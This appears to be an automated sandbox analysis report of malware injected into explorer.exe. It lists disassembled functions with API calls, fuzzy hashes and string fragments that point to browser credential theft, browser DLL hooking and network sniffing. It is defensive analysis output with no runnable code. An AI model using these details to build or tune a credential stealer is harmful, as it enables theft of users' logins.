                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: connect
                                                                                                                    • String ID: conn$ect
                                                                                                                    • API String ID: 1959786783-716201944
                                                                                                                    • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                    • Instruction ID: 6d98d9ef1bb438bd500fa384b937db3ba46125cf94f4b9efb822a0c4c7eb6476
                                                                                                                    • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                    • Instruction Fuzzy Hash: 7F015E30618B188FCB94EF1CE488B55BBE0FB58314F1545AEE90DCB266C774D8818BC2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF0C732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 294 df0c732-df0c768 295 df0c788-df0c7ab connect 294->295 296 df0c76a-df0c782 call df0f942 294->296 296->295
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: connect
                                                                                                                    • String ID: conn$ect
                                                                                                                    • API String ID: 1959786783-716201944
                                                                                                                    • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                    • Instruction ID: 1d7e1578d70eaa3e09af8c27287cd115024d893a86d6b30265eecce090268dbe
                                                                                                                    • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                    • Instruction Fuzzy Hash: 10012C70618A1C8FCB94EF5CE488B55BBE0FB59314F1541AEA90DCB266CB74C9818BC2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF0C6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 407 df0c6b2-df0c6e5 408 df0c705-df0c72d send 407->408 409 df0c6e7-df0c6ff call df0f942 407->409 409->408
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: send
                                                                                                                    • String ID: send
                                                                                                                    • API String ID: 2809346765-2809346765
                                                                                                                    • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                    • Instruction ID: e3b5e94b120cedcd2b426df0c5af8965b305f6dcba9c89c1e043e659438e30d7
                                                                                                                    • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                    • Instruction Fuzzy Hash: 93011270518A188FDBC4EF1CE448B257BE0EB58314F1646AED85DCB266C670D881CB85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF0C5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 412 df0c5b2-df0c5ea 413 df0c60a-df0c62b socket 412->413 414 df0c5ec-df0c604 call df0f942 412->414 414->413
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: socket
                                                                                                                    • String ID: sock
                                                                                                                    • API String ID: 98920635-2415254727
                                                                                                                    • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                    • Instruction ID: 6e15fcfa19593628affc50ece752ff1eded444a8a9809e14bbc3f9f22775d623
                                                                                                                    • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                    • Instruction Fuzzy Hash: E10171306186188FCB84EF1CD448B50BBE0FB59314F1545ADE40ECB266C7B0C981CB82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF042DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 417 df042dd-df04320 call df0f942 420 df04326 417->420 421 df043fa-df0440e 417->421 422 df04328-df04339 SleepEx 420->422 422->422 423 df0433b-df04341 422->423 424 df04343-df04349 423->424 425 df0434b-df04352 423->425 424->425 426 df0435c-df0436a call df0ef12 424->426 427 df04370-df04376 425->427 428 df04354-df0435a 425->428 426->427 430 df043b7-df043bd 427->430 431 df04378-df0437e 427->431 428->426 428->427 432 df043d4-df043db 430->432 433 df043bf-df043cf call df04e72 430->433 431->430 435 df04380-df0438a 431->435 432->422 437 df043e1-df043f5 call df040f2 432->437 433->432 435->430 438 df0438c-df043b1 call df05432 435->438 437->422 438->430
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                    • Instruction ID: 885156304a7034c4de8c33f5ff5f69c842339ee9ac06d63202949f9627a135f6
                                                                                                                    • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                    • Instruction Fuzzy Hash: 20318E74A08B0DDADB68EF2980482A5BBA4FB54301F45927ECA6DC7186C770D490EFD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF04412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 453 df04412-df04446 call df0f942 456 df04473-df0447d 453->456 457 df04448-df04472 call df11c9e CreateThread 453->457
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2422867632-0
                                                                                                                    • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                    • Instruction ID: b0fe3dbc80a0b9b599030ae6137510b9ce2ff21653658eaeed60984f5f46a244
                                                                                                                    • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                    • Instruction Fuzzy Hash: 59F0C234668A484FD788EF2CD84563AB7D0EBA8214F45463EAA4DC3264DA29C9828716
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0DE1BD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                    • API String ID: 0-393284711
                                                                                                                    • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                    • Instruction ID: fa7931d8e16fe755704f69540fecc7a763d28d29a1d6d0121991c550ca073a10
                                                                                                                    • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                    • Instruction Fuzzy Hash: 09E15774618B588FCB64EF68C484BABB7E0FB58304F505A2E969FC7245DF30E5418B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1E792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                    • API String ID: 0-2916316912
                                                                                                                    • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                    • Instruction ID: 8aa4249562f8d88fc62f4537439ba4fdebdc16958b5fadd90b1b9577281d3bac
                                                                                                                    • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                    • Instruction Fuzzy Hash: 0AB19B30618B488EDB65EF68C489AEEB7F1FF98300F40561EE59AC7251EF70D4058B86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1C622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                    • API String ID: 0-1539916866
                                                                                                                    • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                    • Instruction ID: b6195dea29ebad984126b29d022d5b49db1db3815147c329e7362d5acde23f28
                                                                                                                    • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                    • Instruction Fuzzy Hash: 9C41AF70B18B0C8FDB14DF98A4496BDBBE2EB48704F00025ED409E3245DBB5D9458BD6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE23AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                    • API String ID: 0-355182820
                                                                                                                    • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                    • Instruction ID: 6c4e88cd4f655a61eab9df484405cf1e2bed763e5fb9d005cdafb0fb31493d88
                                                                                                                    • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                    • Instruction Fuzzy Hash: D4C16870218B598BC758EF28C885AEAF3E1FB98304F41572E959EC7250DF30E615CB86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE23F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                    • API String ID: 0-97273177
                                                                                                                    • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                    • Instruction ID: a0e1720da27812bd56cdff7820716bc327cf59e23ae6a0759a048c7133b7e374
                                                                                                                    • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                    • Instruction Fuzzy Hash: F251E03061C7488FD719DF18C8816BAB7E5FB94304F502A2EE9CB87241DFB4D9068B82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1D2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                    • API String ID: 0-639201278
                                                                                                                    • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                    • Instruction ID: 4b039ef357c3b0c346624a55a21a7afcc4b76a7e152ed3dcb72ff912ddef8e09
                                                                                                                    • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                    • Instruction Fuzzy Hash: 1AC19E71618A298FC758EF28D895ABAB3E1FB98304F91532D854ED7250DF30EA01CBC5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1D2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                    • API String ID: 0-639201278
                                                                                                                    • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                    • Instruction ID: 8f6e1607018daba595480b3576beba2b5a9fe5ac83b097927cc5d17886d28dcd
                                                                                                                    • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                    • Instruction Fuzzy Hash: ECC19E71618A298FC758EF28D895ABAB3E1FB98304F91532D854ED7251DF30EA018BC5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1ECD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                    • API String ID: 0-2058692283
                                                                                                                    • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                    • Instruction ID: 85c23028fe67a0d0af0782a542e680375c5f7f80feaf8a7dd072e2c9d2ee6afc
                                                                                                                    • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                    • Instruction Fuzzy Hash: 49A1BF706187488BDB29EFA8D484BEEB7E1FF88304F00562DE58AD7241EF70D5458B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1ECE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                    • API String ID: 0-2058692283
                                                                                                                    • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                    • Instruction ID: 9a007f35bbf709e02b3290afcad38788775e139c10af0d206a539f74db17a913
                                                                                                                    • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                    • Instruction Fuzzy Hash: A991AF706187488BDB29EFA8D484BEEB7E1FF98304F00562DE58AD7241EF70D5458B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1E352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $.$e$n$v
                                                                                                                    • API String ID: 0-1849617553
                                                                                                                    • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                    • Instruction ID: dd37959d4458fd3851a218c56c9d273a2b9193110a22f6b1cd7a4b76fe976eb2
                                                                                                                    • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                    • Instruction Fuzzy Hash: 35718031618B488FD758EFA8C4887AAB7F1FF98304F00162EE44AD7261EF71D9458B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE19C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                    • API String ID: 0-1970020201
                                                                                                                    • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                    • Instruction ID: 6438a365282485a7ad06c5ec70cd574764e3b09c86321778d0712bc480572cba
                                                                                                                    • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                    • Instruction Fuzzy Hash: 8F516BB0918B4C8FDB64EFA4C044AEEB7F1FF28300F41562E959AE7254EF3095418B89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1A86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4$\$dll$ion.$vers
                                                                                                                    • API String ID: 0-1610437797
                                                                                                                    • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                    • Instruction ID: eab04c74b45d7f1d2424db1369ff457ec5d882476a6163b84ea38e900c756075
                                                                                                                    • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                    • Instruction Fuzzy Hash: AB417C34219B8C8BCB75EF2898457FAB3E4FB98305F41562E998EC7240EF30D5068782
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1C4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                    • API String ID: 0-327345718
                                                                                                                    • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                    • Instruction ID: 4dcf01e5539167c8961050dd393a05cf2fd6b8cf7a04ec0d341c1e564d188162
                                                                                                                    • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                    • Instruction Fuzzy Hash: E3416D34A58E1D8FCB58EF6880957FEB7E1FB68304F61516AA80EE7200DE70D5408B86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1A432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$el32$h$kern
                                                                                                                    • API String ID: 0-4264704552
                                                                                                                    • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                    • Instruction ID: 06bc6be3f97a664da40f25e721b9518fff31b699a959be52c7678dad380d9959
                                                                                                                    • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                    • Instruction Fuzzy Hash: BB417B7460CB488FD7A9DF2880883BABBE1FBA8305F105A3E959EC2255DF70C545CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE210B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $Snif$f fr$om:
                                                                                                                    • API String ID: 0-3434893486
                                                                                                                    • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                    • Instruction ID: 3afc58e09bb56d076bc958399c48bae94aaf89c9954c131ac41e72c3db5faa13
                                                                                                                    • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                    • Instruction Fuzzy Hash: FB31E57150CB885FD71AEB28C4846EAB7D4FB94300F50591EE49BC7291EE30E64ACB43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE210C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $Snif$f fr$om:
                                                                                                                    • API String ID: 0-3434893486
                                                                                                                    • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                    • Instruction ID: ff8d58ebb67b207cb4bb5945d17cdc2641d8ed6cc2c75595cb72f617034c8ef4
                                                                                                                    • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                    • Instruction Fuzzy Hash: D031C17150CB486FD729EB28C485AFAB7D5FB94300F50591EE49BD7291EE30E606CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1CFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .dll$chro$hild$me_c
                                                                                                                    • API String ID: 0-3136806129
                                                                                                                    • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                    • Instruction ID: 05c85a6b83dd2c37e37e64239a7d2918ec6c8f21d6c0484e66abab81460e0789
                                                                                                                    • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                    • Instruction Fuzzy Hash: 96317E30218B584FCB84FF288495BAAB7E1FB98200F95666D954ECB255DF30D505CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DE1CFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
